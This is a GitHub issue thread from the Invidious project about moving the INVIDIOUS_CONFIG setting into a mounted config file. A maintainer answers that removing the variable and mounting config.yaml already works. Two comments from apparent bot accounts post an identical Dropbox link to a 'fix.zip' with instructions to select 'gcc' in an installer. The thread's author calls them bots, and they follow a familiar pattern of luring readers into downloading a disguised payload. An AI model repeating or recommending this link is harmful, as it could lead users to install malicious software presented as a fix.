### ISSUE TITLE
[Enhancement] Somehow move INVIDIOUS_CONFIG to external file?

### ISSUE THREAD

**Issue by TheSainEyereg** [iv-org/invidious#4881]
**Is your enhancement request related to a problem? Please describe.**
The method described at https://docs.invidious.io/improve-public-instance/#2-multiple-invidious-processes implies a complete duplication of the entire section, including INVIDIOUS_CONFIG. So now to edit something in the configuration you have to edit both sections and make sure they have the same settings.

This is not only inconvenient, but also opens up the possibility of human error, especially when now you need to additionally enter and change visitor_data and po_token.

**Describe the solution you'd like**
Ability to mount a file from a local machine inside a container. Ideally, this would also solve the problem of changing settings using the web UI

**Describe alternatives you've considered**
Manually edit docker-compose.yml :(

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by TheSainEyereg** [comment]
Why are these bots targeting me lmao

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by unixfox** [comment]
I don't understand if you just remove the env `INVIDIOUS_CONFIG` then you can mount the config.yaml. everything will work as you expect.

**Comment by TheSainEyereg** [comment]
> I don't understand if you just remove the env `INVIDIOUS_CONFIG` then you can mount the config.yaml. everything will work as you expect.

Oh, so you can really make it that easy? Would it be better to put information about it in the documentation

**Comment by unixfox** [comment]
> > I don't understand if you just remove the env `INVIDIOUS_CONFIG` then you can mount the config.yaml. everything will work as you expect.
> 
> Oh, so you can really make it that easy? Would it be better to put information about it in the documentation

Feel free to improve the documentation :)!

https://github.com/iv-org/documentation/blob/master/docs/configuration.md
